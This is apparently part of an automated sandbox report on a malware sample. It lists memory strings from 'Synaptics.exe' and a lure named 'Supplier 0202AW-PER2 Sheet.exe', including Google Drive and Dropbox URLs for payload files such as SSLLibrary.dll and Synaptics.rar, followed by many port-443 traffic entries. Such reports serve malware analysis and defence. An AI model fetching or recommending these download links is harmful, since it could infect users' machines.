                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrox
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadruste
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads://Zu
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsT
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadseL
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion-?
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1p
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtRe
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtdx
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtiP
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtn5m
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtubekJ%
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu%
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduble
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadurH
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduri
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadusic.
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv$
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvices
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwC
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwNd
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwv
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyR
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo5Qv
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyodw
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoem
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadytics
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzQ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz~
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: RCXC902.tmp.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goooZ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/7~
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/V~
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Y
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F10C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.0000000005488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHostdoc
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F10C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTO
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000003.00000002.1685726810.00000000080CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadni
                                Source: Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrfqD
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrfqD=O
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrfqDlN
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: RCXC902.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl$
                                Source: RCXC902.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: RCXC902.tmp.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59855 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59958 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59912 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59969 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59923 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59895 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59941 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59867 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59884 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59854 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 60043 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59879 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59922 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59866
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59868
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59867
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59872
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59860 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59879
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59878
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59884
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59959 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59880
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59943 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59966 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59889
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59895
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59937 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59892
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59904 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59866 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59889 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59915 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 60042 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59844 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59829
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59943
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59942
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59944
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59830
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59944 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59958
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59957
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59959
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59956
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59840
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59841
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59829 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59903 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59969
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59847
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59968
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59914 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59844
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59967
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59966
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59853
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59933 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59956 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59925 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 59967 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59855
